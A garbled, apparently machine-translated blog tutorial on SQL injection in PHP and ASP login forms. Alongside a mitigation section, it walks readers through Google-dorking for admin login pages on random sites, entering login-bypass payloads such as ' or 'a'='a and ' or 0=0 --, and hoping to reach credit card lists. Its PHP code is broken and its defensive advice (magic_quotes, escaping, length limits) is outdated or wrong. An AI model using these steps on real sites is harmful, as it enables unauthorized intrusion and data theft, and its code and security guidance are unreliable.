Tricky & Tipsy Friend

Definition of SQL Injection

• SQL injection is a hacking action is performed in the client application by modifying the SQL command that is in memory of the client application. 
• exploit SQL Injection is a technique in which a web application using the database for data storage.

The cause of SQL Injection

• The absence of the handling of the character - the character of single quotes' and also double minus character - which led to an application can be inserted with SQL commands. 
• So a hacker insert SQL commands into a parameter or a form.

Is SQL Injection Bug dangerous ?

1. This technique allows one to log into the system without having to have an account.
2.  In addition, SQL injection also allows one to change, delete, and add data that resides in databases. 
3. Even more dangerous is deadly database itself, so it can not provide services to a web server.

What it takes to perform SQL Injection ?  

1. High Exploler / Browser 
2. Internet connected PC 
3. Programs or software such as softice

 Examples of SQL syntax in PHP

• $ SQL = "select * from login where username = '$ username' and password = '$ password'";, {from GET or POST variable} 
• Fill passwords with string 'or'' =' 
• Then the result will be like this SQL = "select * from login where username = '$ username' and password = 'pass' or' = '';, {with this SQL selection results will always be TRUE} 
• Then we can inject SQL syntax (in this case OR) into SQL

 Handling SQL Injection  

1. Changing the php script 
2. Using mysql_escape_string  
3. Filtering character 'by modifying the php.ini

1 . Changing php script
Examples of the original php script :

$ query = " select id , name , email , password , type , blocks from the user " .
"where email = ' $ email ' and password = ' $ password ' " ;
$ result = mysql_query ( $ query , $ id_mySQL ) ;
while ( $ row = mysql_fetch_row ( $ result ) )
{
$ Id = $ row [ 0 ] ;
$ name = $ row [ 1 ] ;
$ email = $ row [ 2 ] ;
$ password = $ row [ 3 ] ;
$ type = $ row [ 4 ] ;
$ block = $ row [ 5 ] ;
}
if ( strcmp ( $ block , ' yes ' ) == 0 )
{
echo " <script> alert ( ' Your account has been blocked ' ) ;
document.location.href = ' index.php ' ; < / script > \ n " ;
exit ( ) ;
}
else if ( empty ( $ id ) && ! ​​empty ( $ name ) && ! ​​empty ( $ email ) && ! ​​empty ( $ password ) ) ;

This script allows one to log into the SQL command to insert a login form . When hackers insert character ' or'' = ' email and password into the form it will form a query as follows :

So do change the script becomes :
$ query = " select id , name , email , password , type , blocks from the user " .
"where email = ' $ email ' " ;
$ result = mysql_query ( $ query , $ id_mySQL ) ;
while ( $ row = mysql_fetch_row ( $ result ) )
{
$ Id = $ row [ 0 ] ;
$ name = $ row [ 1 ] ;
$ email = $ row [ 2 ] ;
$ password = $ row [ 3 ] ;
$ type = $ row [ 4 ] ;
$ block = $ row [ 5 ] ;
}
if ( strcmp ( $ block , ' yes ' ) == 0 )
{
echo " <script> alert ( ' Your account has been blocked ' ) ;
document.location.href = ' index.php ' ; < / script > \ n " ;
exit ( ) ;
}
$ pass = md5 ( $ password ) ;
else if ( ( strcmp ( $ email , $ email ) == 0 ) && strcmp ( $ pass , $ password ) == 0 ) ) ;

2. using mysql_escape_string
Changing a string containing the character 'becomes \' eg SQL injec'tion into SQL injec \ 'tion
Example:

$ kar = "SQL injec'tion";
$ filter = mysql_escape_string ($ kar);
echo "Results of the filter: $ filter";

3. Filtering character 'by modifying the php.ini
Modifications made ​​by mengenablekan magic_quotes variable in php.ini causing string or character 'changed to \' automatically by php
example:

Example scripts which limit the characters that can be entered :

validatepassword function (input)
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len (input)
c = mid (input, i, 1)
if (InStr (good_password_chars, c) = 0) then
validatepassword = false
exit function
end if
next
end function

Implementation of SQL Injection

1. Go to google or browse the other
2. Enter one of the following keywords

   "/ admin.asp"
   "/ login.asp"
   "/ logon.asp"
   "/ adminlogin.asp"
   "/ adminlogon.asp"
   "/ admin_login.asp"
   "/ admin_logon.asp"
   "/ admin / admin.asp"
   "/ admin / login.asp"
   "/ admin / logon.asp"
   {you can add to your own as desired}

3. Open up any of the links found by Google, chances are you will see a login page (user name danpassword).


4. Enter the following code:
   User name: `or` a '=' a
   Password: `or` a '=' a (including the petiknya)


5. If successful, chances are you will get into the admin panel, where you can add news, edit other user accounts, change about,
   and others. If you are lucky you can get a list of credit cards that much.


6. If it does not work, try searching for another link found by google.


7. Many variations of code that may, among other things:
   User name: admin
   Password: `or` a '=' a
   or can be incorporated into both eg:
   'Or 0 = 0 -; "or 0 = 0 -; or 0 = 0 -;' or 0 = 0 #;
   "Or 0 = 0 #; 'or'x' = 'x;" or "x" = "x;') or ('x' = 'x')

Try to succeed until you can get into the admin panel

How to prevent SQL INJECTION

1. Limit the length of the input box (if possible), with how to limit it in the program code, so the cracker beginners will be confused for a moment look at his input box can not injected with long command.


2. Filter input is entered by the user, especially the use of single quotation marks (Input Validation).


3. Turn off or hide error messages coming out of SQL Server is running.


4. Turn off standard facilities such as Stored Procedures, Extended Stored Procedures if possible.


5. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Hacking is art. Hacking is a blend of knowledge, creativity and patience. If you have all three you will succeed.

ads